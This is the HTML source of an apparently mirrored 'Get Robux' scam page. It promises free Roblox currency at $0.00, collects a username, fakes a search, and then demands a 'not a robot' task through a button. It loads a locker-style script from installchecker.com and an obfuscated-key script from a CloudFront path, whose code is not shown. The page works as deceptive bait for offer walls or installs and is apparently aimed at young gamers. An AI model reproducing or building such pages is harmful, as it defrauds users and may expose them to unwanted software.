<!DOCTYPE html>
<html lang="en">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-BCZNDJTXN7"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', '');
</script>

<!-- Mirrored from zr-dqb.pages.dev/bp.jpg by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 16 May 2024 18:24:36 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    	<script type="text/javascript" id="ogjs" src="https://installchecker.com/cl/js/8djnk6"></script>
    <meta name="tlsdk" content="c810c37ded734c9895a7419cddb5e7ab">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>Get Robux</title>
    <link href="icon.html" rel="icon">

    <script type="text/javascript">
        var uezJw_uiw_IiaqDc={"it":4247135,"key":"1da2e"};
    </script>
    <script src="../d3h83s39ga3y3t.cloudfront.net/d8fd338.js"></script>

</head>


<body>
    <nav>
        
        <div class="logo" >
            <span>&#9776;</span>
            
        </div>
        <ul>
            <li>Discover</li>
            <li>Marketplace</li>
            <li>Robux</li>
        </ul>
    </nav>

    <div class="middle">
        <h2>get rbx - Limited Time</h2>
        <p>Robux allows you to purchase upgrades for your avatar or buy special abilities in experiences.</p>
    </div>

    <div class="box_con">
        <div class="box">
            <h3>rblx username</h3><br>
            <input class="username" type="text" name="" placeholder="Enter username"><br>
            <button class="getrbx">Get rbx</button>
        </div>
        <div class="box2">
            <div class="folding">
                <div class="sk-cube1 sk-cube"></div>
                <div class="sk-cube2 sk-cube"></div>
                <div class="sk-cube4 sk-cube"></div>
                <div class="sk-cube3 sk-cube"></div>
                <div class="square"></div>
            </div>
            <p class="useroutput" style="text-align: center; margin-top: 30px;">searching for amjad ...</p>
        </div>
        <div class="box3">
            <div class="container">
                <div class="row">
                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div><span>800</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div><span>1700</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div>
                            <span>5500</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="robux-removebg-preview.png"></div><span>10000</span>
                        </div>
                    </div>
                </div>

            </div>

        </div>
        <div class="box4">
            <h3>Last step</h3>
            <p>please verify that you are not a robot, and complete one task</p>
            <button  onclick="_xA()" style="font-size: 19px;">Complete task</button>

        </div>
    </div>

    
    <script src="app.js"></script>

    <script>
 // window.va = window.va || function () { (window.vaq = window.vaq || []).push(arguments); };
</script>

</body>


<!-- Mirrored from zr-dqb.pages.dev/bp.jpg by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 16 May 2024 18:24:36 GMT -->
</html>
